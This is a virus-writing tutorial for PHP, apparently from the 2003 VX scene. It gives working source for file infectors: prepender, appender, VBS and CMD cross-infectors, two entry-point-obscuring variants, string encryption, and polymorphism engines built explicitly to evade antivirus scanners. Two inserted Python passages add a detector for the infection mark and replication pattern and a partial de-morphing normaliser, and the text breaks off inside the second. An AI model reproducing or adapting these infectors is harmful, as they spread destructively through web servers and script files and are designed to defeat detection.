Virus creation in PHP
8/7/2019 Creacion de virus en php
http://slidepdf.com/reader/full/creacion-de-virus-en-php 1/21
Index:
0) Intro Words
1) File infection
   a) Prepending
   b) Appending
   c) Cross Infection
      i) VBS infection
      ii) JS infection
      iii) CMD infection
   d) Entry Point Obscuring
      i) Include the virus after a command
      ii) Using a function of the victim
2) Encryption
   a) Changing virus to ASCII
   b) Using an intern decryption function
   c) Using changed character string
3) Polymorphism
   a) Adding Trash
   b) Change Variable Names
   c) Number Changing
4) Other Thoughts
   a) Find more files
   b) Changing the commands
5) Last Words
0) Intro Words
PHP, short for 'Hypertext Preprocessor', is a very common script language for the world-wide-web. You can do nearly everything internet-related with that language. That means you're also able to make viruses with it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was done in October 2000 and was released in 29A#5. It was no real virus, more a companion: it writes to every PHP file in the current directory a line which lets the victim run the virus, but the host doesn't contain the virus. After searching for something about PHP viruses I found out that there is no high-tech PHP virus out so far, because all the viruses I could find are rips of PHP.Pirus (using the same principle). That was my inspiration for writing such an article. I wanted to make something totally new, and I guess I succeeded. I tested every source with PHP 4.3.3, and everything worked fine. Now go on reading this and learn something about PHP viruses! :)
1) File Infection
That's maybe the most important thing when you want to make a PHP virus, therefore I want to explain to you how you can infect files with PHP. It should be no problem to understand the examples, because I tried to make them as simple as possible. When the article was written (autumn 2003), there was no real file infector out there. The only interesting PHP virus so far is MaskBits' PHP.Pirus, which doesn't infect files, but uses the command 'include' so that the virus is executed in every PHP file in the current dir. You may think 'Why does he tell me this?'. I don't know, just for fun :). Now let me explain to you how to infect files.
a) Prepending
A prepender copies its code in front of the victim's code, therefore it will be executed before the victim. That's the main idea of this kind of infection. But there are some other important things you have to note: To get the virus out of the file, you need some information about where the virus is. In my example the virus uses the first 391 bytes. The next important thing is that you must not infect a file two times. What to do against that? Check if the file is already infected. In the following example the virus searches in the first 13 bytes (in an infected file it's this code: '<?php // SPTH') for 'SPTH'. If found, the file won't be infected again. OK, I think you understood. Now let's look at the PHP Prepender Virus example:
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -
<?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    if (!strstr(fread($victim, 13), 'SPTH'))
    {
      rewind($victim);
      fwrite($victim, $string.fread($victim, filesize($file)););
    }
    fclose($victim);
  }
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -
As this is a really easy virus, you should understand it quickly while looking at it. Now I'm going to give you the most important things the example does:
--> Reads the first 391 bytes (which is exactly the virus size)
--> Searches for every .PHP file in the current directory
--> If not infected, reads the victim
b) Appending
An Appender is a virus which copies itself after the victim file. It's really easy to make one. You just have to search for the last PHP part (or just put an infection mark at the beginning of the virus). Then you read till the end, and you have your virus file. The rest should be clear: Search a victim, check that it's not infected and copy the virus body to the end of the file. I made an example for that, as you might think. The exact explanation will be at the end, after the code.
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -
<?php // SPTH
$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH');
$curdir=opendir('.');
while ($file = readdir($curdir))
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    if (!strstr(fread($victim, filesize($file)), 'SPTH'))
    {
      fwrite($victim, $string);
    }
    fclose($victim);
  }
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -
I've already explained how the principle works. Now I'll explain my example to you:
--> Opens the infected file and saves the virus body (searching for 'SPTH' and saving the rest of the file)
--> Searches for every PHP file in the current directory.
--> Checks that it's not infected (searches for the infection mark 'SPTH' anywhere in the file; if not found: not infected)
--> Copies the virus body to the file
c) Cross Infection
Cross Infection means infecting more than one file extension. That's really useful, because the virus will spread much faster. That was my inspiration in writing this. I found some nice ways to infect other file formats, therefore I want to show them to you. The biggest problem while coding these things was that you can't execute a .php file directly, but only with an Internet Browser. Fortunately Microsoft made it possible to open the Internet Explorer very easily. :)
i) VBS infection
It's really easy to infect a VBS file, because the only important thing if you want to write such a cross infector is that you don't use the sign [" = chr(34)], because VisualBasicScript uses it for strings, and since our whole code is a string in the VBS file, there would be an error. Now look at the example and try to understand it (shouldn't be too difficult, because I made it very easy to read).
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$vbscode='set fso=WScript.CreateObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.chr(13).chr(10);
$vbscode.='set shell=WScript.CreateObject('.chr(34).'WScript.Shell'.chr(34).')'.chr(13).chr(10);
$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13).chr(10);
while ($string && $string!='?>')
{
  $vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);
  $string=strtok(chr(13).chr(10));
}
$vbscode.='virus.WriteLine('.chr(34).'?';
$vbscode.='>'.chr(34).')'.chr(13).chr(10);
$vbscode.='virus.Close()'.chr(13).chr(10);
$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);
$directory=opendir('.');
while ($file = readdir($directory))
{
  if (strstr($file, '.vbs'))
  {
    fwrite(fopen($file, 'w'), $vbscode);
  }
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
It should be totally easy to understand this example. Anyway, I'll give you the main ideas of the little code:
--> Splits the PHP code (= the virus) into lines [chr(13).chr(10)]
--> Makes a VBS code which generates a new HTM file containing the virus
--> Adds every line to the VBS (as string, so it will be written to the HTM file, which will be generated by the VBS [?!?! :D])
--> After finishing the VBS code, it searches for every .VBS in the current directory and overwrites it with the code which we made before.
ii) JS infection
Infecting a JavaScript file is nearly the same as infecting a VBS file, therefore I won't give you an example. The reason for this is that we're using WScript in VBS and JS. The only thing you have to do is to change the 'set' to 'var', and the '.vbs' to '.js', but I guess you know that :D. I tried it, and it worked fine.
iii) CMD infection
This was the most difficult file extension which I made for this article. The reason is easy to explain: CMD = Batch for WinNT/00/XP = DOS. And as you know, you are NOT allowed to use any '>', '<' or '&' in a DOS string. But I solved the problem, as you may imagine ;). I used the character codes in every string instead of the real signs. Then I had 2 more problems: the beginning and the end of the PHP code, where we MUST write '<' or '>'. So I thought about that, and suddenly an idea came to my mind: I'll use a JavaScript file to write the first and the last line to the .htm file. And since I have to use a script anyway for starting the Internet Explorer (to run the PHP code; DOS can't open an Internet Browser), I used that file. The result of my coding is the following file :D. I'll explain the main ideas more exactly after the source.
- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -
<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$string=strtok(chr(13).chr(10));
$cmdcode='cls'.chr(13).chr(10).'@echo off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);
while ($string{0}!='?')
{
  $cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr(10);
  $string=strtok(chr(13).chr(10));
}
$cmdcode.='echo var fso=WScript.CreateObject("Scripting.FileSystemObject");'.chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo var shell=WScript.CreateObject("WScript.Shell");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr(62).chr(62).'file.js'.chr(13).chr(10);
$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,10)+all+String.fromCharCode(13,10,63,62));'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='cscript file.js';
$directory=opendir('.');
while ($file = readdir($directory))
{
  if (strstr($file, '.cmd'))
  {
    fwrite(fopen($file, 'w'), $cmdcode);
  }
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -
Now the short explanation of the code:
--> Reads the whole file content (the virus) and splits it into lines
--> Makes the .CMD code, which doesn't contain any '>', '<' and '&' (that was the problem I wrote about before)
--> Adds a JavaScript code to the .CMD code, so the first and the last lines ('<?php' and '?>') will be added to the new .htm file.
--> Adds a code to the .CMD code which runs the Internet Explorer
--> Overwrites every .CMD file in the current directory with the CMD code.
d) Entry Point Obscuring
This is a really important technique in virus-writing. Maybe some of you don't know what EPO exactly is, so I'll explain it to you: An AV program searches in most cases at some static offsets for the virus (maybe at the beginning or at the end). To fool them, we have to use a variable address for the virus, and not use any jump or call to the virus at a static address. How could we do this? I'll show you a short 'graphic'. At this point I want to thank SnakeByte for his Perl-EPO article [released in 29a#6] for the idea of how to make an EPO virus in a script language. So, here is the graphic:

[ part of the victim file ]
information about the address
read xxx lines of the virus
open PHP file
read yyy lines
insert the virus
read rest
close PHP file
[ rest of the victim file ]

Now we have another problem: Where to include the virus code in the host file? SnakeByte did it by searching for ';', which is the end of a Perl command. As you might know, PHP statements also end with a ';'. Then I thought about another way which could also be done, since that technique could destroy the victim file. Then I got an idea: including the code in a function. How exactly I mean this, I'll show you after the ';' example.
i) Include the virus after a command
As I already told you, this idea comes from SnakeByte. To include a virus after a command, you have to search for a ';', which is the end of every PHP statement. That seems to be everything. Now let's have a look at the example for this EPO technique.
- - - - - - - - - - - - - [ EPO virus - Type I ] - - - - - - - - - - - - -
<?php
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 987);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    $vicont=fread($victim, filesize($file));
    if (!strstr($vicont, 'SPTH'))
    {
      $possible=0; $c=0;
      while($c<filesize($file))
      {
        if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $possible++; }
        $c++;
      }
      $which=rand(1,$possible); $c=0; $i=0;
      while($which)
      {
        if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $which--; }
        $c++;
      }
      rewind($victim);
      $a=fread($victim, $c); $b=fread($victim, filesize($file));
      fclose($victim);
      fwrite(fopen($file, 'w'), $a.chr(13).chr(10).'$ln='.$c.';'.chr(13).chr(10).$content.chr(13).chr(10).$b);
    }
  }
}
?>
- - - - - - - - - - - - - [ EPO virus - Type I ] - - - - - - - - - - - - -
This is an example for the EPO technique which I described above. It's quite easy to understand; anyway, I'll tell you how the virus works exactly:
--> Searches for itself in the host file and reads the next 987 bytes.
--> Opens a .php file
--> Checks how many possible entry points the virus has
--> Picks one entry point randomly
--> Reads the code before the EP and the code after it
--> Writes the code before, the virus code and the code after the entry point to the file
ii) Using a function of the victim
This technique is maybe a little bit better than the other one. But in fact I haven't seen this type of EPO in any script virus (OK, I haven't seen really many EPO script viruses :D). I've already told you that the virus will use a function of the host file. But maybe you don't really understand what I mean, therefore I'll show you. Here you can see a non-infected file and an infected file. Hope that helps you to get the point of the idea:
Normal File:                Infected File:
_________________________   _________________________
HOST-CODE-1                 HOST-CODE-1
call to function()          call to function()
HOST-CODE-2                 HOST-CODE-2
function()                  function()
  HOST CODE-3                 < < VIRUS > >
end function                  call to real function
HOST-CODE-4                 end function
_________________________   HOST-CODE-4
                            real function
                              HOST CODE-3
                            end real function
                            _________________________
Now you should understand what I mean, but how to manage this? First you have to search for every function in the code, then you use one of them, save the victim's function code and copy the virus code into the function. After the virus code you need a call to a real function, which you can add at the end of the file. The name of the real function is no problem, since your code calls it. Now I also made an example for this technique, as you may imagine. Look at it, and try to understand. The technical description will follow after the code:
- - - - - - - - - - - - - [ EPO virus - Type II ] - - - - - - - - - - - - -
<?php
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 1611);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
  if (strstr($file, '.php'))
  {
    $victim=fopen($file, 'r+');
    $vicont=fread($victim, filesize($file));
    if (!strstr($vicont, 'SPTH'))
    {
      $possible=0; $viccont=$vicont;
      while(strstr($viccont, 'function '))
      {
        $viccont=strstr($viccont, 'unction ');
        $possible++;
      }
      $which=rand(1,$possible);
      $viccont=$vicont;
      while($which--)
      {
        $viccont=strstr($viccont, 'function ');
      }
      $viccont=strstr($viccont, '{');
      $before=strlen($vicont)-strlen($viccont)+1; $check=0; $i=0;
      do
      {
        if ($viccont{$i}=='{') { $check++; }
        if ($viccont{$i++}=='}') { $check--; }
      }while($check);
      fseek($victim, $before);
      $funccont=fread($victim, $i+1);
      fseek($victim, $before+$i-1);
      $aftercont=fread($victim, filesize($file)-$before-$i-strlen(strstr($vicont, '?>')));
      $coundj=0; $newvar='';
      do
      {
        $newvar.=chr(rand(97,122)); $countj++;
      }while ($countj<rand(5,15));
      rewind($victim);
      $beforecont=fread($victim, $before);
      rewind($victim);
      fwrite($victim, $beforecont.chr(13).chr(10).'$ln='.($before+strlen($before)+9).';'.chr(13).chr(10).$content.chr(13).chr(10).$newvar.'(); }'.$aftercont.chr(13).chr(10).'function '.$newvar.'() {'.chr(13).chr(10).$funccont.'?'.'>');
    }
  }
}
?>
- - - - - - - - - - - - - [ EPO virus - Type II ] - - - - - - - - - - - - -
To understand this code, you must not be a beginner. :) I worked about 4-5h at this little thing. Anyway, it works really fine and I want to tell you how it works:
--> Searches for the virus itself via a variable called '$ln', which contains the information where the virus is in the file. The variable has to be newly generated every virus run, since the virus is at different places every generation. It contains the entry point in bytes.
--> Searches for a .PHP file which is not already infected
--> Searches for 'function ' in the victim, to get the possible new entry points
--> Picks one entry point randomly
--> Searches for the content which is before the found function
--> Searches for the function content
--> Searches for the content which is after the found function
--> Makes a new function with a random name, and includes the function content
--> Writes the begin-content, the function with the virus content, a call to the new function (which contains the real host code), the after-content, and the new function with the whole content from the function.
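Looking at the file-infection section from the other side: the scanner below is an added example (not code from the article) that flags a PHP source carrying the 'SPTH' mark of the prepender and appender, the '$ln=' offset line that both EPO variants plant in the host, and the read-own-source / readdir / fwrite combination all of the infectors above share. The three fixture sources are constructed for the demonstration and are not working infectors.

```python
import re

# The infection mark and the code shapes below come from the examples on this page.
MARKER = "SPTH"

# Behaviour every infector above shares: read its own source through __FILE__,
# walk the current directory with readdir(), and write into the files it finds.
RX_READS_SELF = re.compile(r"fopen\(\s*__FILE__\s*,")
RX_READDIR = re.compile(r"readdir\(")
RX_FWRITE = re.compile(r"fwrite\(")
RX_TARGET_EXT = re.compile(r"strstr\(\s*\$\w+\s*,\s*'\.(php|vbs|js|cmd)'\s*\)")
# Both EPO variants plant a "$ln=<offset>;" line in the host and later
# fseek() to that offset inside __FILE__ to find their own body.
RX_EPO_OFFSET = re.compile(r"^\s*\$ln\s*=\s*\d+\s*;", re.M)
RX_EPO_SEEK = re.compile(r"fseek\(\s*\$\w+\s*,\s*\$ln\s*\)")
# Appender: a second PHP block carrying the mark glued right after a close tag.
RX_APPENDED = re.compile(r"\?>\s*<\?php\s*//\s*" + MARKER)


def scan_php_source(src: str) -> list:
    """Return the indicator names found in one PHP source text (empty if clean)."""
    findings = []
    # Prepender: the mark sits inside the first 13 bytes, the same window the
    # prepender itself inspects before deciding whether a file is infected.
    if MARKER in src[:13]:
        findings.append("prepender_marker")
    if RX_APPENDED.search(src):
        findings.append("appender_marker")
    if RX_EPO_OFFSET.search(src) and RX_EPO_SEEK.search(src):
        findings.append("epo_offset_variable")
    # Behavioural check independent of the mark, so a generation with a
    # changed mark or renamed variables still trips it.
    if RX_READS_SELF.search(src) and RX_READDIR.search(src) and RX_FWRITE.search(src):
        findings.append("self_replication_pattern")
        if RX_TARGET_EXT.search(src):
            findings.append("targets_script_extensions")
    return findings


def scan_files(paths) -> dict:
    """Scan files on disk; returns {path: findings} for those with any hit."""
    report = {}
    for path in paths:
        with open(path, "r", encoding="latin-1", errors="replace") as fh:
            hits = scan_php_source(fh.read())
        if hits:
            report[path] = hits
    return report


# Constructed fixtures for the demonstration; they are not working infectors.
CLEAN_SOURCE = """<?php
$cfg = parse_ini_file('app.ini');
$log = fopen('app.log', 'a');
fwrite($log, date('c') . " started\\n");
fclose($log);
?>"""

PREPENDED_HOST = """<?php // SPTH
$body = fread(fopen(__FILE__, 'r'), 391);
$dir = opendir('.');
while ($name = readdir($dir)) {
  if (strstr($name, '.php')) { /* routine elided */ fwrite($target, $body); }
}
?>
<?php echo 'original host code'; ?>"""

EPO_HOST = """<?php
function greet() { echo 'hello'; }
greet();
$ln=57;
$filehandle=fopen(__FILE__,'r');
fseek($filehandle, $ln);
$content=fread($filehandle, 987);
echo 'more host code';
?>"""


if __name__ == "__main__":
    for label, src in (("clean", CLEAN_SOURCE), ("prepended", PREPENDED_HOST), ("epo", EPO_HOST)):
        print("%-10s %s" % (label, scan_php_source(src)))
```

The marker checks are cheap but brittle (a changed mark defeats them), which is why the behavioural check is kept separate and reported on its own.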
2) Encryption
The first part of the article should give you the idea of how to write a successful virus in PHP. But more or less, these techniques are easy to detect for Anti-Virus companies. Therefore I also want to show you how to fool them. This part (and of course the next part: Polymorphism) of the article should help you to write a PHP virus which can not be detected by a simple string scan, or at least to decrease scan strings. I found many different ways to encrypt a PHP string, and of course I want to tell you about them :)
a) Changing virus to ASCII
Turning the whole virus into characters should not be a big problem. To execute the code in character form I thought about 'eval()'. But after 2h of testing I saw that it doesn't work. So I had to think of another way: Write the virus code (written in ASCII) to a new file, run the file via 'include()', and delete it. Therefore I made an example which shows how you may use the technique:
- - - - - - - - - - - - - [ Encryption Example - Type I ] - - - - - - - - - - - - -
<?php
$content=chr(60).chr(63).chr(112).chr(104).chr(112).chr(13).chr(10).chr(112).chr(114).chr(105).
chr(110).chr(116).chr(40).chr(34).chr(72).chr(105).chr(32).chr(86).chr(88).chr(101).
chr(114).chr(33).chr(32).chr(84).chr(104).chr(105).chr(115).chr(32).chr(105).chr(115).
chr(32).chr(106).chr(117).chr(115).chr(116).chr(32).chr(97).chr(32).chr(115).chr(105).
chr(108).chr(108).chr(121).chr(32).chr(116).chr(101).chr(115).chr(116).
chr(32).chr(115).chr(116).chr(114).chr(105).chr(110).chr(103).chr(32).chr(102).chr(111).chr(114).chr(32).
chr(116).chr(104).chr(101).chr(32).chr(101).chr(110).chr(99).chr(114).chr(121).chr(112).
chr(116).chr(105).chr(111).chr(110).chr(32).chr(105).chr(110).chr(32).chr(80).chr(72).
chr(80).chr(46).chr(34).chr(41).chr(59).chr(13).chr(10).chr(63).chr(62);
copy(__FILE__,'file.php');
$a=fopen('file.php','w+');
fwrite($a, $content);
fclose($a);
include('file.php');
unlink('file.php');
?>
- - - - - - - - - - - - - [ Encryption Example - Type I ] - - - - - - - - - - - - -
You should understand the principle of the code really fast. The encrypted code contains a 'secret' message. :) I'll show you how it works, if you haven't understood it so far:
--> '$content' contains a PHP script in ASCII form. Here you should use your virus code. Just make ASCII codes of the normal letters, and add them to a variable. NOTE: Since the encrypted data should be a fully working file, you have to add '<?php', '?>' and the whole PHP syntax (for instance semicolons).
--> Makes a new file (because I couldn't find a command to make a file, I copy '__FILE__' and overwrite it)
--> Writes the encrypted content to the file (but now: unencrypted!)
--> Opens the file (via 'include(<-file->)')
--> Deletes the file (via 'unlink(<-file->)')
b) Useing an intern decryption function
This headline sounds strange. Well, it isn't :). The basis of the idea is this one: You call a function with 3 values and get the right sign back. The idea isn't hard to understand. I used the same principle as in the last example. The only difference is the encryption: Now I use a function call instead of a real sign. But because the function calculates the right sign and returns it, it's no problem. I hope that you understand it. Now let's have a look at my example for this technique:
- - - - - - - - - - - - - [ Encryption Example - Type II ] - - - - - - - - - - - - -
<?php
$content=cr(-177,237,1).cr(169,106,2).cr(-135,247,1).cr(150,46,2).cr(8624,77,3).cr(56,43,2).
cr(1900,190,3).cr(127,15,2).cr(20,94,1).cr(51,54,1).cr(110,0,2).cr(372,256,2).
cr(247,207,2).cr(57,18,2).cr(-1,84,1).cr(322,221,2).cr(147,48,2).cr(232,121,2).
cr(7700,70,3).cr(-33,133,1).cr(-31,63,1).cr(180,97,2).cr(-106,207,1).cr(-148,247,1).
cr(184,70,2).cr(322,221,2).cr(-48,164,1).cr(167,135,2).cr(-71,148,1).cr(24947,247,3).
cr(10810,94,3).cr(202,87,2).cr(4559,47,3).cr(261,158,2).cr(312,211,2).cr(-79,111,1).
cr(-3,61,1).cr(-5,73,1).cr(2262,58,3).cr(56,15,2).cr(-145,204,1).cr(3289,253,3).
cr(225,215,2).cr(21,42,1).cr(302,240,2);
copy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');
function cr($a,$b,$c)
{
  if ($c==1) { return(chr($a+$b)); }
  if ($c==2) { return(chr($a-$b)); }
  if ($c==3) { return(chr($a/$b)); }
}
?>
- - - - - - - - - - - - - [ Encryption Example - Type II ] - - - - - - - - - - - - -
Well, you should have understood what I meant when you looked at the code. I'll show you what it does exactly. The encrypted code is a secret message again :)
--> Every sign is a call to the function with 3 values. The first and the second value are the numbers, the third value is just the information which calculation the function will have to do (+,-,/), something like the key.
--> After getting every sign, the code does the same as the code above.
c) Useing changed character string
This technique is a well-known one in script languages. For instance jackie did it in JavaScript. Therefore I thought that it should also be possible to do it in PHP. And as you can see, it was. The technique works as follows: The (virus) code is encrypted in a variable. It's encrypted by adding 3 (the key) to the ASCII code of every character. Should be easy to understand. Now let's look at the example I made:
- - - - - - - - - - - - - [ Encryption Example - Type III ] - - - - - - - - - - - - -
<?php
$all='?Bskssulqw+*111frro/#wklv#lv#wkh#wklug#hqfuswlrq#whfkqltxh#dqg#rx#duh#vwloo#zlwk#ph111#=,*,>BA';
$i=0; $content='';
while($i<strlen($all)) { $content.=chr(ord($all{$i++})-3); }
copy(__FILE__,'file.php');
$aa=fopen('file.php','w+');
fwrite($aa, $content);
fclose($aa);
include('file.php');
unlink('file.php');
?>
- - - - - - - - - - - - - [ Encryption Example - Type III ] - - - - - - - - - - - - -
The encrypted variable content contains the code of a PHP file writing a message to the screen. The rest works as always: Making a new file, overwriting it with the decrypted code, executing the file, and deleting it. How the en/decryption works I'll show you:
--> Changes every character of the encrypted string to ASCII numbers (via 'ord()')
--> Decreases the number by the key (which is 3 in this sample)
--> Changes the number back to characters (via 'chr()'), and you've got the real string.
3) Polymorphism
As everybody knows, this is one of the most important techniques to fool AVs and to show that you know what you're doing :). So I decided to also write something about this technique here. In fact, I've never seen any other poly PHP virus around the world (maybe it exists anyway). It was really easy for me to write some poly engines, because PHP isn't a really difficult language. I tried my best to show you how a PHP poly engine could work.
a) Adding Trash
This technique is well-known in many script languages. Therefore I thought it should also be possible in PHP. Then I sat down and began to write. About 2h later (with smoking breaks, sure :D), I had the finished code. First I want to tell you what kind of trash/junk/garbage I included in my example:
- // shsdfjksfdjfds
- $kasjkh=192847832;
- $lwekjcmws='iwsdkjhfskjbnla';
Well, now we know what to include. Anything else to do? Sure, we have to delete the trash again, other wise the file would have 2MB after the 10th time you run it, and I think you don't want that. :) So, how to delete trash? In my example I looked at the first letter of a line and checked if it's a '/' or a '$'. If yes, it's trash and we don't have to include it in our new code. It seems I explained everything. Now let's have a look at the code:
- - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - - -
<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='<?php'.chr(13).chr(10);
srand((double)microtime()*1000000);
while ($string && $string!='?>') {
  if(rand(0,1)) {
    if (rand(0,1)) { $newcont.='// '.trash('').chr(13).chr(10); }
    if (rand(0,1)) { $newcont.='$'.trash('').'='.chr(39).trash('').chr(39).';'.chr(13).chr(10); }
    if (rand(0,1)) { $newcont.='$'.trash('').'='.rand().';'.chr(13).chr(10); }
  }
  $string=strtok(chr(13).chr(10));
  if ($string{0}!='/' && $string{0}!='$') { $newcont.=$string.chr(13).chr(10); }
  fwrite(fopen(__FILE__, 'w'),$newcont);
}
function trash($var) {
  do { $var.=chr(rand(97,122)); } while (rand(0,7));
  return $var;
}
?>
- - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - - -
Everything should be clear now; anyway, I'll tell you the most important things in this code snippet:
--> It splits the whole file content of the virus ('__FILE__', as it's called in PHP) into lines (chr(13).chr(10)).
--> One in two, if the last line wasn't trash, it adds a trash line.
--> If the last line was no trash line, it adds the line to the new content
--> It writes the new content to the file
b) Variable Changing
This is another well-known script technique to morph the virus. So I did it again in PHP. Let's explain the technique. You're using many variables in a virus, and if the variables have the same name every generation, our friends the AV guys are able to use this fact to detect the virus. So it could be of much value to change the variable names. How I did it? I used an array with all the variables which I'm using. Then I searched for every value from the array in the virus file (= I searched for every variable), and replaced it via the command 'str_replace' with a new one, which I got from my 'trash function'. Now let's look at the source of the example:
- - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - - - - -
<?php
$changevars=array('changevars', 'content', 'newvars', 'counti','countj', 'trash');
srand((double)microtime()*1000000);
$content=fread(fopen(__FILE__,'r'),filesize(__FILE__));
$counti=0;
while($changevars[$counti]) {
  $content=str_replace($changevars[++$counti], trash('',0), $content);
}
fwrite(fopen(__FILE__,'w'),$content);
function trash($newvar, $countj) {
  do { $newvar.=chr(rand(97,122)); } while (++$countj<rand(5,15));
  return $newvar;
}
?>
- - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - - - - -
Easy code, easy to understand. Anyway, let me tell you how exactly it works:
--> Makes a new array with all variable and function names
--> Gets the whole content of the virus file
--> Replaces every element of the array in the content with a new one.
--> Writes the content back to the file
c) Number Changing
Every code contains some numbers, whatever these numbers do. After thinking a little bit I found out that I can change the numbers too. So I decided to make a PHP code which changes the numbers in its code. How can we change a number, you may think. It's really easy: You make a calculation with that number which returns the number you want. Let's have a look at the possible variants:
--> 10=(12-2)
--> 10=(8+2)
--> 10=(80/8)
I also tried to use div, but there are comma numbers which don't really work. But it's no problem, there are enough variants with just 3 calculation types. Now I'll show you how a number could look after the 4th morphing:
--> 10=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))))
Now I hope that you know about the damn cool results of this technique :)
After explaining the main thing, I'll show you the little code which changes the numbers.
- - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - - - -
<?php
$newcont=fread(fopen(__FILE__,'r'),filesize(__FILE__));
srand((double)microtime()*1000000);
$count=-1; $number='';
while(++$count<strlen($newcont)) {
  if (ord($newcont{$count})>47 && ord($newcont{$count})<58) {
    $number=$newcont{$count};
    while(ord($newcont{++$count})>47 && ord($newcont{$count})<58) { $number.=$newcont{$count}; }
    $remn=rand(1,10);
    switch(rand(1,3)) {
      case 1:$cont.='('.($number-$remn).'+'.$remn.')'; break;
      case 2:$cont.='('.($number+$remn).'-'.$remn.')'; break;
      case 3:$cont.='('.($number*$remn).'/'.$remn.')'; break;
    }
  }
  $cont.=$newcont{$count};
  $number='';
}
fwrite(fopen(__FILE__,'w'),$cont);
?>
- - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - - - -
Now a short explanation about the code:
--> Reads everything from the file
--> Searches for a number in every sign [sign>chr(47) && sign<chr(58)]
--> Reads the rest of the number
--> Makes a new calculation with that number
--> Writes the new content to the file
4) Other thoughts
When I wrote this article, some other ideas came to my mind, therefore I also want to give the ideas to you. Maybe some of the ideas are just nonsense or others are brilliant (I don't think so, but wonders happen :D). OK, let's start: This part contains ideas for better hiding so you don't get detected, or for how to spread faster. I hope you also like to read this!
a) Find more files
What must we do if we want to find more files? Search in more directories. :) My idea is this one: Since the command 'getcwd()' returns the current dir, we are also able to infect every directory above it. How to do this? Look at the return value of 'getcwd()':
--> E:\SPTH\Programme\minixampp\htdocs
Now we have 4 directories which aren't infected so far:
~~ E:\SPTH\Programme\minixampp
~~ E:\SPTH\Programme
~~ E:\SPTH
~~ E:\
And how to get the directories? Just search for a '\' in the current dir, then delete character by character till you have a '\'. Then you have the directory name. The rest is easy: Open it via 'opendir()', and do the same as I tried to explain to you :)
b) Changing the commands
Maybe you already know it, but PHP contains tons of aliases for different commands, and we can use that. I'm sure you know how :) Just replace one command with another which is doing the same. I made a list of commands and their aliases, to show you how much we are able to change. This is just a short list, nevertheless it could be useful when you want to make such a polymorphic virus.
chop - rtrim()
close - closedir()
die - exit()
dir - getdir()
doubleval - floatval()
fputs - fwrite()
ini_alter - ini_set()
is_double - is_float()
is_integer - is_int()
is_long - is_int()
is_real - is_float()
is_writeable - is_writable()
join - implode()
magic_quotes_runtime - set_magic_quotes_runtime()
pos - current()
rewind - rewinddir()
show_source - highlight_file()
sizeof - count()
strchr - strstr()
Get the full list of aliases here: http://zend.com/phpfunc/all_aliases.php
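The three polymorphism engines in part 3 (trash lines, variable renaming, number changing) and the alias substitution just described all leave the code's meaning untouched, which is exactly what a normaliser on the scanning side relies on. The added example below (not code from the article) folds the nested arithmetic back to its constant, drops junk lines whose variable is never used again, rewrites the page's aliases to their canonical names and renumbers variables by first appearance, so a morphed generation and its original normalise to the same text. The MORPHED and ORIGINAL fragments are constructed for the demonstration; the alias table keeps only entries from the page's list that are genuine PHP aliases.

```python
import re

# Aliases from the page's list that are real PHP aliases; left side is
# rewritten to the right side so both spellings yield the same text.
CANONICAL = {
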